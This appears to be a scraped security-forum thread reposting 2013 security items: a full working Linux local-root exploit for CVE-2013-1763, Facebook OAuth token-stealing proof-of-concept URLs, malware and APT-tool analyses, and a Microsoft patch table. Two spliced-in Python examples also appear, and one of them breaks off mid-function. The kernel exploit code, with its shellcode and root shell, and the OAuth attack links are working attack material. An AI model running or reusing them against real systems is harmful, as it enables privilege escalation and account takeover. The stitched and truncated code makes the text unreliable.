/lib/tls/i686/cmov/libpthread.so.0 #8 0xb2f44a4e in clone () from /lib/tls/i686/cmov/libc.so.6 Thread 18 (Thread 0xac4eeb70 (LWP 10491)): #0 0xb3d80430 in __kernel_vsyscall () #1 0xb3365015 in 
Source: Google Chrome 21.0.1180.57 NULL Pointer ≈ Packet Storm
  8. Fedora Linux SOCK_DIAG Local Root Authored by Thiebaud Weksteen Local root exploit for Fedora 18 x86_64 using nl_table to leverage the sock_diag_handlers[] vulnerability.

/*
 * CVE-2013-1763 SOCK_DIAG bug in kernel 3.3-3.8
 * This exploit uses nl_table to jump to a known location
 */
#include <unistd.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <netinet/tcp.h>
#include <errno.h>
#include <linux/if.h>
#include <linux/filter.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <linux/sock_diag.h>
#include <linux/inet_diag.h>
#include <linux/unix_diag.h>
#include <sys/mman.h>

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);

_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
unsigned long sock_diag_handlers, nl_table;

int __attribute__((regparm(3)))
kernel_code()
{
    commit_creds(prepare_kernel_cred(0));
    return -1;
}

unsigned long
get_symbol(char *name)
{
    FILE *f;
    unsigned long addr;
    char dummy, sym[512];
    int ret = 0;

    f = fopen("/proc/kallsyms", "r");
    if (!f) {
        return 0;
    }

    while (ret != EOF) {
        ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sym);
        if (ret == 0) {
            fscanf(f, "%s\n", sym);
            continue;
        }
        if (!strcmp(name, sym)) {
            printf("[+] resolved symbol %s to %p\n", name, (void *) addr);
            fclose(f);
            return addr;
        }
    }
    fclose(f);
    return 0;
}

int main(int argc, char*argv[])
{
    int fd;
    unsigned family;
    struct {
        struct nlmsghdr nlh;
        struct unix_diag_req r;
    } req;
    char buf[8192];

    if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){
        printf("Can't create sock diag socket\n");
        return -1;
    }

    memset(&req, 0, sizeof(req));
    req.nlh.nlmsg_len = sizeof(req);
    req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;
    req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;
    req.nlh.nlmsg_seq = 123456;
    req.r.udiag_states = -1;
    req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;

    commit_creds = (_commit_creds) get_symbol("commit_creds");
    prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
    sock_diag_handlers = get_symbol("sock_diag_handlers");
    nl_table = get_symbol("nl_table");

    if(!prepare_kernel_cred || !commit_creds || !sock_diag_handlers || !nl_table){
        printf("some symbols are not available!\n");
        exit(1);
    }

    family = (nl_table - sock_diag_handlers) / 8;
    printf("family=%d\n",family);
    req.r.sdiag_family = family;

    if(family>255){
        printf("nl_table is too far!\n");
        exit(1);
    }

    unsigned long mmap_start, mmap_size;
    mmap_start = 0x100000000;
    mmap_size = 0x200000;
    printf("mmapping at 0x%lx, size = 0x%lx\n", mmap_start, mmap_size);

    if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,
             MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {
        printf("mmap fault\n");
        exit(1);
    }
    memset((void*)mmap_start, 0x90, mmap_size);

    char jump[] = "\x55"                          // push %ebp
                  "\x48\x89\xe5"                  // mov %rsp, %rbp
                  "\x48\xc7\xc0\x00\x00\x00\x00"  // movabs 0x00, %rax
                  "\xff\xd0"                      // call *%rax
                  "\x5d"                          // pop %rbp
                  "\xc3";                         // ret
    unsigned int *asd = (unsigned int*) &jump[7];
    *asd = (unsigned int)kernel_code;
    printf("&kernel_code = %x\n", (unsigned int) kernel_code);
    memcpy( (void*)mmap_start+mmap_size-sizeof(jump), jump, sizeof(jump));

    if ( send(fd, &req, sizeof(req), 0) < 0) {
        printf("bad send\n");
        close(fd);
        return -1;
    }
    printf("uid=%d, euid=%d\n",getuid(), geteuid() );

    if(!getuid())
        system("/bin/sh");
}

Source: Fedora Linux SOCK_DIAG Local Root ≈ Packet Storm
  9. Nytro

    [SQLi] PNL.ro

    What is there to show off about, that you visited a link and put in a quotation mark? Trashed!
  10. Unhooking the SSDT? Does it work on Kaspersky too?
  11. Yes, I also have RSSOwl and it is well put together. PS: For some feeds it always finds old items as new. But otherwise it's OK.
  12. 1. Only BitDefender? 2. Was Proactive Defence (or whatever it is called at Bit) turned on? 3. Does it have a driver? Does it run in kernel mode?
  13. [h=1]BackTrack successor Kali Linux launched[/h]By Darren Pauli on Mar 13, 2013 10:04 PM

A computer small enough to fit inside the palm of a hand sits in the corner of an office, its lights blinking. It looks like a toy to most, but the small ARM-based machine is running the latest version of BackTrack, and is breaking into the corporate network. Such a feat was not possible prior to this evening's release of Kali, the sixth installment of the uber-powerful and super-secure penetration testing platform.

BackTrack obtained support for ARM-based devices as part of its quiet year-long and ground-up overhaul by the small group of security professionals who designed the operating system, now considered essential kit for penetration tests. The authors, hailing from Offensive Security, together with security professionals at Rapid7, who offered free assistance in the rebuild, announced Kali at BlackHat Europe.

Outwardly, Kali looks the same as the previous version of BackTrack. But dig a little deeper, according to founder Mati Aharoni, and that's where the similarities end. "It boots like BackTrack, but when you look deeper into Kali, you see all these amazing new features that just weren't available in BackTrack," Aharoni told SC, speaking ahead of the launch in Amsterdam. "Everything has changed."

Kali has become sleeker and more secure: all packages were subject to a vetting process and were signed by developers with GPG keys. This, Aharoni said, introduced complete visibility into the development chain. "There is a very clear public development of each package so you can see changes easily. Visibility increased ten-fold."

The Metasploit Framework too has been rebuilt. Rapid7, keen to remove the rough-around-the-edges integration of the popular exploit arsenal within BackTrack, contacted Offensive Security. In a streak of luck, the call came in early in Kali's development. From there, Metasploit underwent a considerable overhaul to become one of the most complex packages in Kali. "Users will be in for a much smoother ride," Aharoni said. "It was never built to be packaged as a distribution so we needed to massage it." This took the form of a Debian repo rather than an at times messy binary installer, Rapid7 product manager Christian Kirsch said. "A tonne of our users were using Metasploit on BackTrack," Kirsch said. "Now if you update Kali, you update Metasploit." "It is critical to take the view of the attacker to see if your defences are working. The smartest people in the world may make mistakes in setting up defences." It also features a more friendly user interface and was available in the paid professional edition.

A razor has been applied to BackTrack's pre-packaged pen testing tools, eradicating 50 unpopular tools and introducing more powerful offerings into Kali. iKat, a hacking tool to audit the security of browser-controlled environments like kiosks, Citrix terminals and WebTVs, was one such addition. The developers went to lengths to get the tool on board and had even helped the author further develop and integrate it into Kali.

Kali comes as fully customisable. Users were able to pick and choose the tools they want in the platform, including private applications, prior to downloading the ISO, even down to their choice of wallpaper. This, Aharoni said, makes Kali open to low-end systems and ARM-based devices. Pre-built packages exist for a host of ARM devices including Raspberry Pi and ODROID. Kali is now available for download and the wiki page is also online.

Source: BackTrack successor Kali Linux launched - Applications - SC Magazine Australia - Secure Business Intelligence
  14. [h=3]Facebook hacking accounts using another OAuth vulnerability[/h]Posted by: Mohit Kumar on Tuesday, March 12, 2013

Remember the last OAuth flaw in Facebook, which allowed an attacker to hijack any account without the victim's interaction with any Facebook application, reported by white hat hacker 'Nir Goldshlager'. After that, the Facebook security team fixed the issue using some minor changes. Yesterday Goldshlager once again pwned the Facebook OAuth mechanism by bypassing all those minor changes done by the Facebook team. He explains the complete saga of hunting the Facebook bug in a blog post.

As explained in the last report on The Hacker News, the OAuth URL contains two parameters, i.e. redirect_uri & next, and using Regex Protection (%23xxx!,%23/xxx,/) the Facebook team tried to secure that after the last patch. In the recently discovered technique the hacker found that the next parameter allows the facebook.facebook.com domain as a valid option, and multiple hash signs are now enough to bypass the Regex Protection. He uses the facebook.com/l.php file (used by Facebook to redirect users to external links) to redirect victims to his malicious Facebook application and then to his own server for storing token values, where tokens are the alternate access to any Facebook account without a password.

But a warning message while redirecting ruins the show! No worries, he found that 5 bytes of data in the redirection URL are able to bypass this warning message. Example: https://www.facebook.com/l/goldy;touch.facebook.com/apps/sdfsdsdsgs (where 'goldy' is the 5 bytes of data used). Now at the last step, he redirects the victim to external websites located at files.nirgoldshlager.com (attacker server) via the malicious Facebook app created by him, and the victim's access_token will be logged there. So here we have the final POC that can hack any Facebook account by exploiting another Facebook OAuth bug.

For all browsers: https://www.facebook.com/connect/uiserver.php?app_id=220764691281998&next=https://facebook.facebook.com/%23/x/%23/l/ggggg%3btouch.facebook.com/apps/sdfsdsdsgs%23&display=page&fbconnect=1&method=permissions.request&response_type=token

For Firefox browser: https://www.facebook.com/dialog/permissions.request?app_id=220764691281998&display=page&next=https%3A%2F%2Ftouch.facebook.com%2F%2523%2521%2Fapps%2Ftestestestte%2F&response_type=token&perms=email&fbconnect=1

This bug was also reported to the Facebook Security Team last week by Nir Goldshlager and is patched now; if you are a hacker, we expect YOU to hack it again!

Source: Facebook hacking accounts using another OAuth vulnerability - Hacking News
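The bypass above works because the `next` parameter was filtered with a pattern on the raw string, so a look-alike subdomain, repeated hash signs and an open redirector all slipped through. The defensive alternative, as an added example that is not part of the article or of Facebook's code, is to parse the redirect target and compare its components against an exact allowlist registered per client; the client id, domain and registered callback below are constructed placeholders, and `weak_check` only mimics the kind of suffix regex the post describes.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed allowlist (hypothetical values): client id -> exact
# (scheme, host, path) redirect targets registered when the app was created.
REGISTERED_REDIRECTS = {
    "app-123": {("https", "www.example-bank.test", "/oauth/callback")},
}

# A pattern check of the kind the post describes being bypassed: it anchors on
# a trusted host suffix, so any subdomain passes, and it never looks at the
# fragment, query string or path that follows the host. Shown only to contrast.
WEAK_PATTERN = re.compile(r"^https://[A-Za-z0-9.-]*example-bank\.test/")


def weak_check(next_url):
    """Regex-style validation of the redirect target (the weak approach)."""
    return WEAK_PATTERN.match(next_url) is not None


def validate_redirect(client_id, next_url):
    """Return (accepted, reason) for an already-decoded `next` parameter.

    Rules: compare parsed components, never substrings of the raw string;
    exact match against the client's registered targets; no fragment, no
    query, no userinfo, no non-default port, no residual percent-encoding.
    """
    allowed = REGISTERED_REDIRECTS.get(client_id)
    if not allowed:
        return False, "unknown client"
    # The web framework already decoded the query parameter once; anything
    # still encoded is a double-encoding attempt (e.g. %2523 -> %23 -> '#').
    if unquote(next_url) != next_url:
        return False, "residual percent-encoding"
    # Fragments are where the token lands and where the '#'-juggling in the
    # post happens, so a registered callback never contains one.
    if "#" in next_url:
        return False, "fragment not allowed"
    parts = urlsplit(next_url)
    if parts.scheme != "https":
        return False, "scheme must be https"
    # 'https://trusted.example@evil.test/...' parses with a userinfo part.
    if parts.username is not None or parts.password is not None:
        return False, "userinfo not allowed"
    try:
        port = parts.port
    except ValueError:
        return False, "invalid port"
    if port not in (None, 443):
        return False, "non-default port"
    # An open redirector such as /l.php?u=... needs a query string; the
    # registered callback does not, so none is accepted.
    if parts.query:
        return False, "query string not allowed"
    target = (parts.scheme, parts.hostname or "", parts.path or "/")
    if target not in allowed:
        return False, "target not registered for client"
    return True, "ok"


if __name__ == "__main__":
    # Constructed sample inputs modelled on the shapes described in the post.
    samples = [
        "https://www.example-bank.test/oauth/callback",
        "https://example-bank.example-bank.test/#/x/#/l/ggggg;evil.test/apps/x",
        "https://www.example-bank.test/l.php?u=https://evil.test",
        "https://www.example-bank.test/oauth/callback%23x",
        "https://www.example-bank.test@evil.test/oauth/callback",
    ]
    for url in samples:
        print(f"weak={weak_check(url)!s:5} strict={validate_redirect('app-123', url)}  {url}")
```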
  15. Yes, but I did not post that link. There may be people who want to try it.
  16. [h=3]Assessing risk for the March 2013 security updates[/h]swiat 12 Mar 2013 10:07 AM

Today we released seven security bulletins addressing 20 CVEs. Four of the bulletins have a maximum severity rating of Critical, and three have a maximum severity rating of Important. We hope that the table below helps you prioritize the deployment of the updates appropriately for your environment.

[TABLE]
[TR]
[TD]Bulletin[/TD]
[TD]Most likely attack vector[/TD]
[TD]Max Bulletin Severity[/TD]
[TD]Max Exploitability Index[/TD]
[TD]Likely first 30 days impact[/TD]
[TD]Platform mitigations and key notes[/TD]
[/TR]
[TR]
[TD]MS13-021 (Internet Explorer)[/TD]
[TD]Victim browses to a malicious webpage.[/TD]
[TD]Critical[/TD]
[TD]1[/TD]
[TD]Exploit code for CVE-2013-1288, an issue affecting IE8, is publicly available. Likely to see reliable exploits developed within next 30 days for other vulnerabilities addressed by this update as well.[/TD]
[TD]IE 10 on Windows 7 is not affected.[/TD]
[/TR]
[TR]
[TD]MS13-022 (Silverlight)[/TD]
[TD]Victim browses to a malicious webpage.[/TD]
[TD]Critical[/TD]
[TD]1[/TD]
[TD]Likely to see reliable exploits developed within next 30 days.[/TD]
[TD]Affects Silverlight 5.[/TD]
[/TR]
[TR]
[TD]MS13-027 (Windows USB driver)[/TD]
[TD]Attacker physically inserts malicious USB device into victim's workstation or server, resulting in code execution at SYSTEM.[/TD]
[TD]Important[/TD]
[TD]1[/TD]
[TD]Likely to see reliable exploits developed within next 30 days.[/TD]
[TD]Pre-auth code execution only possible for attacker able to physically insert malicious hardware device into victim computer. See this blog post for more background on this vulnerability.[/TD]
[/TR]
[TR]
[TD]MS13-024 (SharePoint 2010)[/TD]
[TD]Attacker issues a search query on the SharePoint site with malicious script in the query string. In certain circumstances, a SharePoint admin may view search queries in such a way that the script from the attacker's search query is run in the context of the SharePoint administrator's session.[/TD]
[TD]Critical[/TD]
[TD]1[/TD]
[TD]Likely to see reliable exploits developed within next 30 days.[/TD]
[TD]Affects only SharePoint Server 2010 Service Pack 1, no earlier or later versions of SharePoint.[/TD]
[/TR]
[TR]
[TD]MS13-023 (Visio Viewer 2010)[/TD]
[TD]Victim uses Visio Viewer 2010 to open a malicious Visio .DXF file.[/TD]
[TD]Critical[/TD]
[TD]2[/TD]
[TD]Less likely to see reliable exploit developed for this vulnerability. Visio Viewer exploits not often seen in the wild and this one looks more difficult than usual to exploit for reliable code execution.[/TD]
[TD]Visio itself not affected by this vulnerability directly. Only Visio Viewer 2010 affected.[/TD]
[/TR]
[TR]
[TD]MS13-025 (OneNote 2010)[/TD]
[TD]Attacker lures victim to open OneNote file from a malicious or attacker-controlled directory. Attacker uses this vulnerability to cause process memory from the victim's OneNote process to be written back to the file in the attacker's directory, potentially leaking information to the attacker.[/TD]
[TD]Important[/TD]
[TD]n/a[/TD]
[TD]Not possible to leverage this vulnerability for code execution directly. Information disclosure only.[/TD]
[TD]Affects only OneNote 2010 Service Pack 1, no earlier or later versions of OneNote. Attacker must lure victim to opening file from a server or location they control. Only information in the OneNote process at the time of user opening the malicious file could become accessible to the attacker.[/TD]
[/TR]
[TR]
[TD]MS13-026 (Office Outlook for Mac)[/TD]
[TD]Attacker sends victim an email with links to external content. Content is loaded without prompting user.[/TD]
[TD]Important[/TD]
[TD]n/a[/TD]
[TD]Not possible to leverage this vulnerability for code execution directly. Information disclosure only.[/TD]
[TD] [/TD]
[/TR]
[/TABLE]

- Jonathan Ness, MSRC Engineering

Source: Assessing risk for the March 2013 security updates - Security Research & Defense - Site Home - TechNet Blogs
  17. Can You Crack a Code? Apparently this is the problem given in my cryptography course at university. 12/24/09 We've challenged you before—in November 2007, December 2008, and May 2009—to unravel a code and reveal its secret message like the “cryptanalysts” in our FBI Laboratory. In our latest quiz, we've switched gears a bit, using pictogram symbols based on Native American motifs. And with more than 50 words to decipher, it's our longest one so far. For the first time, we're also posting the answer (see the bottom of this page) in case you are stumped. We ask, however, that you not post the solution on the web so that everyone can have a chance to give it a try. Once again: If you want a primer on basic cipher systems and how to break them, see the article "." Good luck! Note: Sorry, but cracking this code doesn't guarantee you a job with the FBI! But do check out careers with us at FBIJobs.gov. Source: FBI — Cryptanalysis Challenge 2009
  18. [h=2]Mobile Drive-By Malware example[/h]Jan Širmer March 11th, 2013 Several days ago we received a complaint about javascrpt.ru. After a bit of research, we found that it tries to mimic ajax.google.com and jquery, but the code is an obfuscated/packed redirector. After removing two layers of obfuscation, we found a list of conditions checking visitors’ user Agent. From these conditions. we got a clue and focused on mobile devices. It all starts when a user start browsing internet from their mobile devices. They visit a legitimate site that’s been hacked. This site contains a link to the site javascrpt.ru, where visitors’ browser data is sent. If script hosted at javascrpt.ru recognizes the visitor’s user Agent string as one of the list of conditions, the visitor is redirected to the malicious site, usually hosted at legitimate hosting, distributing malicious files for mobile devices. When users reach this site, the drive-by download starts. We found different behaviors for different devices. For non Android mobiles, a file called load.php ( 2DECBD7C9D058A0BFC27AD446F8B474D99977A857B1403294C0D10078C2DB51D ) is downloaded, though in a fact it is a regular Java file. But as you can see our users are well protected: But the question is what is really happening with an unprotected user? After running this file, the user expects a running application that they started, but in this case a list of agreements appears. And the first line is ‘To gain access to content, you must agree to the terms presented below’. And what are those terms? 1. To gain access to the Service wa**y.ru/ content to make payment by sending up to 3 SMS messages 2. 
For complete information on pricing, it can be found at the web site: www.mo****1.ru/ (This site doesn't work right now.)

Both Android and other devices send SMS to these Russian premium numbers:

NUMBER = "7255"; NUMBER = "7151"; NUMBER = "9151"; NUMBER = "2855";

After sending the SMS, just a simple ICQ application is downloaded from the same site: *REMOVED*/land_paysites/files/icq.jar

To show better what happens when this site is reached from an Android device, you can check the next screenshots. At first, a file called, e.g., browser.apk (94FDC9CFD801E79A45209BFDC30711CB393E39E6BF2DD43CE805318E80123C14) is downloaded to the device — without the person's knowledge. You can see in the install window that this application wants access to suspicious services that cost you money. Even in the application permissions you can find suspicious permissions for your messages and to directly call phone numbers that can cost you money, too. But fortunately avast! stops this application before it can cost you a huge amount of money.

If a user installs this application, its behavior is very similar to non-Android devices. The device sends pay text messages to those numbers and then downloads and installs a basic Dolphin browser from h***t.ru/land_browsers/files/dolphin.apk

Users should be really careful if they find some unknown application on their mobile device. Fortunately everybody can read what an application will get access to, but unfortunately a lot of users don't really pay attention to the required permissions and it can cost them a lot of money. Using a good antivirus can help them to be protected.

Source: http://blog.avast.com/2013/03/11/mobile-drive-by-malware-example/
  19. [h=1]Nanomite - Graphical Debugger for x64 and x86 on Windows[/h]

[h=2]Changelog[/h]

[h=3]Version 0.1 beta 7[/h]
fixed some small handling bugs
fixed a bug in disassembler which did not replace old protection on memory after disassembling
fixed a bug which did not show terminated processes in DetailView
fixed a bug which did not show terminated threads in DetailView
fixed a bug which did not clean up memory on manual debuggee stop
improved DB handler
added resolve of jump conditions to improve StepOver
added "Return" and "Backspace" Hotkey to navigate in Disassembler
added "Clear Log" context menu in LogBox
added "Show Source" context menu in Disassembler
added "Goto Function" context menu in Callstack
added a crash handler
added Source Viewer
added memory pool for performance improvement and memory leak reduction
added mouse scrolling in disassembler and stack
added direct run of target after using menu to select a file

Source code: https://github.com/zer0fl4g/Nanomite
  20. In-Depth Look: APT Attack Tools of the Trade
4:41 pm (UTC-7) | by Kyle Wilhoit (Threat Researcher)

Recently, we shed some light on APT attack tools and how to identify them. Part of our daily tasks as threat researchers revolves around investigating APT actors, and the tools that they utilize, to help better protect our customers. The purpose of this blog is to further investigate the tools that APT actors typically use and what they do with them.

How these tools are used

While many would think these tools are used during the initial compromise phase of an attack, that is not the case with this post. I will be focusing on the tools that are used after the initial compromise is attained. The following diagram illustrates where these tools are commonly used in a traditional APT lifecycle.

Figure 1. Traditional APT lifecycle

Step 1: The attacker sends malware to the victim. This can be done in many ways – an email message with a malicious attachment, a USB flash disk, or a compromised web site are all possibilities.
Step 2: The malware is executed on the affected system. This may require manual steps by the victim, or it could be done without any intervention using exploits.
Step 3: When the malware is run, it drops a backdoor such as STARSYPOUND or BOUNCER. These first stage tools push a backdoor to the attacker for later access. (These could be considered first stage tools). It allows the attacker to maintain persistence and get access to the system at a later time.
Step 4: The attacker then uploads tools to perform data exfiltration, lateral movement, and a litany of other tasks.

Tools overview

The tools listed below include some of the tools APT actors use on a daily basis. These tools are typically employed once the APT actor gets access to the victim's machine via one of the first stage tools listed above. Keep in mind however, that these tools are not inclusive of first stage tools such as backdoors, Trojans, and other categorical tools.
In addition, this is not a complete listing of tools since that is impossible to create based on the ever-changing threat landscape. Many APT actors use custom coded applications that perform similar functionality, and thus may differ from those listed below. Use this list as a baseline of functionality to help identify similar tools in your environment and to demonstrate known tools that are used in common APT campaigns.

Word of caution

Identifying these tools does not necessarily imply that you have been compromised or fallen victim to an APT attack. The IOCs contain both MD5s of the compiled apps/scripts, and/or unique strings within the code prior to being compiled. Minor modifications to these files can change the MD5 hash, so this is a limited method for identification of these applications/scripts. Also note that the phase of usage is generic for when Trend Micro typically sees these tools used. These tools are sometimes used in other stages of APT attacks. Some of them also have valid use cases where there are business needs for using the application. (Some examples include Netbox, dbgview, sdelete, etc.)

[TABLE=align: center]
[TR]
[TD=align: center]Tool Name[/TD] [TD=align: center]Description[/TD] [TD=align: center]Typical Phase of Usage[/TD] [TD=align: center]Indicators of Compromise (IOC)[/TD]
[/TR]
[TR]
[TD=align: center]GETMAIL[/TD] [TD=align: center]Typically used to ascertain mail archives and mail out of those archives.[/TD] [TD=align: center]Exfiltration[/TD] [TD=align: center]Unique String: Lu's Crazy Profile (democode) Saved File Name: >=3 digit number-attach.doc[/TD]
[/TR]
[TR]
[TD=align: center]Netbox[/TD] [TD=align: center]For hosting tools/drop servers/C2 servers. Commonly used as infrastructure on the backend to support operational tasks. (Netbox also has valid uses, and is not a direct indicator of compromise)[/TD] [TD=align: center]Attack, Exfiltration, Persistence[/TD] [TD=align: center]N/A[/TD]
[/TR]
[TR]
[TD=align: center]Pwdump[/TD] [TD=align: center]Dumps password hashes from the Windows registry. Typically used to crack passwords for lateral movement throughout the victim environment. It can also be used in pass-the-hash attacks.[/TD] [TD=align: center]Lateral Movement[/TD] [TD=align: center]MD5: 0xDD2EF0D6487385839BBF7863FE450CC5[/TD]
[/TR]
[TR]
[TD=align: center]Cachedump[/TD] [TD=align: center]A program for extracting cached password hashes from a system's registry. Typically used to crack passwords for lateral movement throughout the victim environment. It can also be used in pass-the-hash attacks.[/TD] [TD=align: center]Lateral Movement[/TD] [TD=align: center]MD5: 5065266fbad9362d5a329c5388627ea5[/TD]
[/TR]
[TR]
[TD=align: center]Lslsass[/TD] [TD=align: center]Dumps active login session password hashes from Windows processes. It is used to crack passwords for lateral movement throughout the victim environment. It can also be used in pass-the-hash attacks.[/TD] [TD=align: center]Persistence, Lateral Movement[/TD] [TD=align: center]MD5: ede305561db6f7ca1783e0fc75d0db14[/TD]
[/TR]
[TR]
[TD=align: center]mapiget[/TD] [TD=align: center]This is for collecting emails directly from Outlook, prior to ever getting archived. It is then dumped to text files.[/TD] [TD=align: center]Persistence, Lateral Movement[/TD] [TD=align: center]Unique String: WNetCancelConnection2W Saved File Name: 5-mail.txt, mail.txt[/TD]
[/TR]
[TR]
[TD=align: center]HTRAN[/TD] [TD=align: center]Connection bouncer, redirects TCP traffic destined for one host to an alternate host. It is also used to help obfuscate the source IP of an attacker. It allows the attacker to bounce through several connections in the victim country, confusing incident responders.[/TD] [TD=align: center]Attack, Exfiltration, Persistence[/TD] [TD=align: center]MD5: e0c14f98c4d4b995f00d49616bf9ba57, 2edfe2b5238c8f49130f2a2f85e33c18, 1725e68e574e4b077f7d16f7fa30d984, 7e3bb01afb4c50da526d142fdf444688, 3548ea689e06a2599bdd1bdb909abb75[/TD]
[/TR]
[TR]
[TD=align: center]Windows Credential Editor (WCE)[/TD] [TD=align: center]A security tool that allows you to list logon sessions and add, change, list and delete associated credentials[/TD] [TD=align: center]Persistence, Lateral Movement[/TD] [TD=align: center]MD5: bd73c74819d8db09c645c738bbd3f5b9, df840ac27051d26555a109cc47d03fe4[/TD]
[/TR]
[TR]
[TD=align: center]Lz77.exe[/TD] [TD=align: center]It is used as a compression application to help exfiltrate data. This is commonly seen in Winrar, 7zip, and Winzip.[/TD] [TD=align: center]Exfiltration[/TD] [TD=align: center]MD5: 2238453fd8225baff0d52bf64361b4fd[/TD]
[/TR]
[TR]
[TD=align: center]Gsecdump[/TD] [TD=align: center]Grabs SAM file, cached credentials, and LSA secrets. Used for lateral movement in the victim environment and pass-the-hash style attacks.[/TD] [TD=align: center]Lateral Movement[/TD] [TD=align: center]MD5: 57F222D8FBE0E290B4BF8EAA994AC641, 875f3fc948c6534804a26176dcfb6af0, 8ee24ad5b849877907304de566fb6dc6[/TD]
[/TR]
[TR]
[TD=align: center]ZXProxy (A.K.A AProxy)[/TD] [TD=align: center]Proxy functionality for traffic redirection. This helps redirect HTTP/HTTPS connections for source obfuscation. We have seen it used in data exfiltration.[/TD] [TD=align: center]Exfiltration, Persistence[/TD] [TD=align: center]MD5: 0xEB36A5EF6A807FB7B2E2912E08B4882D, 0x69F5A988B4F3A3E5D300D489C9707CD6, 286760651edfe6a8b34988004156b894[/TD]
[/TR]
[TR]
[TD=align: center]LSB-Steganography[/TD] [TD=align: center]Uses steganography techniques to embed files into images. This helps with data exfiltration as well as during the initial compromise of a traditional APT attack.[/TD] [TD=align: center]Initial Compromise, Exfiltration[/TD] [TD=align: center]MD5: c188ef350f1ee0e5fa6f6ef2e70231bc[/TD]
[/TR]
[TR]
[TD=align: center]UPX Shell[/TD] [TD=align: center]Used to help pack code for malware used in APT campaigns. This tool helps prevent reverse engineering and code analysis.[/TD] [TD=align: center]Attack, Persistence[/TD] [TD=align: center]MD5: 1281478d409de246777472db99f58751[/TD]
[/TR]
[TR]
[TD=align: center]ZXPortMap[/TD] [TD=align: center]Traffic redirection tool, which helps to obfuscate the source of connections.[/TD] [TD=align: center]Persistence, Exfiltration[/TD] [TD=align: center]MD5: 9a7b9caae7b8b3a2b5d68e6880b6d0a4, 2fdbb3ee0edc5e589ea727bbc2cd6d50[/TD]
[/TR]
[TR]
[TD=align: center]ZXHttpServer[/TD] [TD=align: center]Small HTTP server that is deployable and extremely flexible. We have seen it used when attempting transfer of some files.[/TD] [TD=align: center]Exfiltration[/TD] [TD=align: center]Unique String: ZXHttpServer, ZXHttpServer.exe[/TD]
[/TR]
[TR]
[TD=align: center]Sdelete[/TD] [TD=align: center]Secure deletion tool. Allows for secure deletion to make forensic recovery difficult, therefore complicating incident response procedures.[/TD] [TD=align: center]Persistence, Cover[/TD] [TD=align: center]MD5: e189b5ce11618bb7880e9b09d53a588f[/TD]
[/TR]
[TR]
[TD=align: center]Dbgview[/TD] [TD=align: center]An application that lets you monitor debug output on your local system, or any computer on the network that you can reach via TCP/IP[/TD] [TD=align: center]Persistence, Lateral Movement[/TD] [TD=align: center]MD5: cea66497fa93db4b0dd33438a2a5d6bd[/TD]
[/TR]
[/TABLE]

Many of these tools are copied to victim machines, and are often never removed by the APT actors for whatever reason.
If you happen to see tools that are similar in function to the tools listed above, I think it warrants a closer look at the tools, and how they are being used in your environment.

What Can Be Done

There are many things that can be done to help prevent the installation of these applications onto your organizational machines, such as the following:

Utilize application whitelisting where necessary to prevent these items from being installed/used on your systems.
Include SIEM resources in your organizational budget for robust logging. This will help forensically should it be needed.
Remove local administrator rights for users. This will help prevent new applications from being installed in the traditional fashion. While some of these applications don't require install to work, not having administrator rights will limit what these applications can do.

Many of the tools listed above will be blocked by Trend Micro products, which classify them as malicious.

Here are some additional recommendations on what to do when you see these applications being used for malicious means:

Look at firewall, system, security, proxy, and other logs that your system is logging to identify usage patterns of the tools. Look for communication on erroneous ports as well as traffic to IP space that is not typical to the user.
Utilize IOCs (indicators of compromise) to locate similar filenames or MD5/SHA hashes for applications similar to the above. Focus on path of utilization as well as filename oddities. (Such as an app named xzz.exe, which would raise a red flag)
Utilize WMIC to create a script that can search throughout your entire organizational Active Directory trees and look for unique identifiers of these tools.
Create a list of bad applications unique to your organization. Utilize these lists and the native toolsets of each operating system to locate questionable tools. Tools for Windows like PsExec work well for this. On Linux systems, dpkg-query or qpkg work well for this.
Source: In-Depth Look: APT Tools of the Trade | TrendLabs Security Intelligence Blog
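The post's recommendation to sweep for IOC hashes and unique strings is easy to script. What follows is an added example, not Trend Micro's code or anything from the post: it normalises the mixed hash formats in the table above (some entries carry a 0x prefix, cases differ), walks a directory tree, hashes every file and checks small files for the unique strings. The tree it scans is constructed inside the script; the hashes are copied from the table, and the constructed sample file's own hash is appended to the list so the run produces a visible match. WNetCancelConnection2W is deliberately left out of the string set because it is an ordinary Win32 API import and would flag legitimate binaries.

```python
"""IOC sweep over a directory tree: MD5 hashes plus unique strings.

Added example, not Trend Micro's code. Hash values are taken from the table
in the post; the directory it scans is constructed below.
"""
import hashlib
import os
import shutil
import tempfile

# Hashes exactly as they appear in the table (Pwdump, Cachedump, HTRAN, ZXProxy).
IOC_MD5_RAW = [
    "0xDD2EF0D6487385839BBF7863FE450CC5",
    "5065266fbad9362d5a329c5388627ea5",
    "e0c14f98c4d4b995f00d49616bf9ba57",
    "0xEB36A5EF6A807FB7B2E2912E08B4882D",
]
# Unique strings from the table. WNetCancelConnection2W (mapiget) is a Win32 API
# name that legitimate binaries import too, so it is kept out of this set.
IOC_STRINGS = [b"Lu's Crazy Profile", b"ZXHttpServer"]


def normalize_md5(value):
    """Lower-case 32-hex-digit form; accepts the table's 0x-prefixed entries."""
    v = value.strip().lower()
    if v.startswith("0x"):
        v = v[2:]
    if len(v) != 32 or any(c not in "0123456789abcdef" for c in v):
        raise ValueError("not an MD5 hex digest: %r" % value)
    return v


def md5_file(path, chunk=1 << 16):
    h = hashlib.md5()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def scan_tree(root, ioc_hashes, ioc_strings, max_string_scan=8 << 20):
    """Return [(path, reason)] where reason is 'md5:<digest>' or 'string:<s>'."""
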